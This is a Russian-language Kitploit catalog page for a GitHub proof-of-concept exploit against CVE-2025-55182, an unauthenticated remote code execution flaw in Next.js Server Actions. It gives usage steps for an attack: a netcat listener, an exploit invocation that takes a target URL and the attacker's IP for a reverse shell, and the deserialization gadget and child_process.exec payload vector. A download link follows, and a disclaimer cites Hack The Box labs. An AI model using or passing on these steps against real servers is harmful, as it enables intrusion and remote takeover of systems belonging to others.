Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/uwugreed/cve-2025-55182-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubuwugreed/cve-2025-55182-poc

CVE-2025-55182-poc

Я знаю, что вы, скорее всего, пришли сюда с Hack the Box, и если так, то да, этот действительно работает.

Репозиторий
7 ч 42 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182-poc

Эксплойт proof-of-concept (PoC) для CVE-2025-55182, нацеленный на неаутентифицированную уязвимость удалённого выполнения кода (RCE) в Next.js Server Actions.

Этот эксплойт использует загрязнение прототипа (prototype pollution) во время десериализации multipart-полезных нагрузок React Server Components (RSC), чтобы внедрить вредоносные команды в процесс Node.js с помощью асинхронного, неблокирующего потока выполнения.


Возможности

  • Асинхронное выполнение: Использует child_process.exec() вместо блокирующих API execSync(), чтобы предотвратить зависание потоков на контейнерных узлах.
  • Надёжная доставка через несколько оболочек: Использует POSIX-совместимую строку reverse shell через FIFO-канал для максимальной стабильности выполнения в минималистичных Linux-контейнерах.
  • Без внешних зависимостей: Полностью реализован с использованием встроенной библиотеки Python requests.

Использование

1. Настройка прослушивателя

Откройте терминал на вашем атакующем хосте и запустите netcat-прослушиватель для приёма входящего обратного соединения:

root@kitploit:~
nc -lvnp 4444

2. Запуск скрипта

Укажите базовый URL цели, IP-адрес вашего локального интерфейса и желаемый порт прослушивателя:

root@kitploit:~
python3 exploit.py <target_url> <your_ip> [your_port]

Пример:

root@kitploit:~
python3 exploit.py http://website.whatever:port x.x.x.x 4444

Технические детали

Скрипт отправляет сформированную сырую multipart-полезную нагрузку непосредственно на конечную точку маршрутизации приложения с требуемым заголовком маршрутизации Next-Action.

Используя сигнатуры конструктора объектов через {"get":"$1:constructor:constructor"}, движок десериализации загрязняет нативное дерево объектов. При обработке сопутствующих параметров он интерпретирует вредоносно внедрённый блок контекста _response как очередь инструкций, что позволяет выполнять код с привилегиями контекста пользователя запущенного Node-сервера.

root@kitploit:~
// Базовый вектор цели:
process.mainModule.require('child_process').exec('your_payload_here');

⚠️ Отказ от ответственности

Этот скрипт создан строго в образовательных целях, для авторизованного тестирования безопасности и захвата уязвимых флагов на лабораторных площадках, таких как Hack The Box. Автор не несёт ответственности за любое неправомерное использование, несанкционированное вторжение в системы или ущерб, причинённый данным инструментом.

Скачать инструмент